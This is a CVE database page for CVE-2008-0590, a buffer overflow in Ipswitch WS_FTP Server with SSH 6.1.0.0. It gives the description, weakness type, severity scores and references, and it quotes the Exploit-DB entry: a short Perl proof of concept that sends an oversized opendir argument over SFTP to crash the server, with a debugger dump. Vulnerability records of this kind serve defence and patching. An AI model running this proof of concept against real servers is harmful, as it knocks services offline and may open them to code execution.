CVE-2008-0590 : Detail

CVE-2008-0590

Overflow
2.3%V4
Network
2008-02-05
10h00 +00:00
2018-10-15
18h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Buffer overflow in Ipswitch WS_FTP Server with SSH 6.1.0.0 allows remote authenticated users to cause a denial of service (crash) and possibly execute arbitrary code via a long opendir command.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-119 Improper Restriction of Operations within the Bounds of a Memory Buffer
The product performs operations on a memory buffer, but it reads from or writes to a memory location outside the buffer's intended boundary. This may result in read or write operations on unexpected memory locations that could be linked to other variables, data structures, or internal program data.

Metrics

Metrics Score Severity CVSS Vector Source
V2 9 AV:N/AC:L/Au:S/C:C/I:C/A:C nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 5044

Publication date : 2008-02-02 23h00 +00:00
Author : securfrog
EDB Verified : Yes

# IpSwitch WS_FTPSERVER with SSH remote Buffer Overflow # # Website:http://www.wsftp.com/products/ws_ftp_server/ # # Version:6.1.0.0 ( last one,others might be vuln too ) # # Bug: Remote Buffer Overflow ( CD) # # (8e8.a78): Access violation - code c0000005 (first chance) # First chance exceptions are reported before any exception handling. # This exception may be expected and handled. # eax=00000000 ebx=00000000 ecx=00410041 edx=7c9137d8 esi=00000000 edi=00000000 # eip=00410041 esp=04b8c830 ebp=04b8c850 iopl=0 nv up ei pl zr na po nc # cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246 # 00410041 ?? ??? # # #Here's the PoC : use strict; use Net::SSH2; my $ip="127.0.0.1"; my $port=22; my $user="USERNAME"; my $pass="PASSWORD"; my $ssh2 = Net::SSH2->new(); my $payload ="A" x 5131; $ssh2->connect($ip, $port) || die "could not connect"; $ssh2->auth_password($user,$pass)|| die "wrong passwd/login"; print "Poc running ...\n"; my $sftp = $ssh2->sftp my $dir = $sftp->opendir($payload); print "Buffer Overflow Successfull\n"; $ssh2->disconnect(); exit; # milw0rm.com [2008-02-03]

Products Mentioned

Configuraton 0

Progress>>Ws_ftp_server >> Version 6.1.0.0

References

http://www.securityfocus.com/bid/27573
Tags : vdb-entry, x_refsource_BID
https://www.exploit-db.com/exploits/5044
Tags : exploit, x_refsource_EXPLOIT-DB
http://secunia.com/advisories/28753
Tags : third-party-advisory, x_refsource_SECUNIA
http://securityreason.com/securityalert/3609
Tags : third-party-advisory, x_refsource_SREASON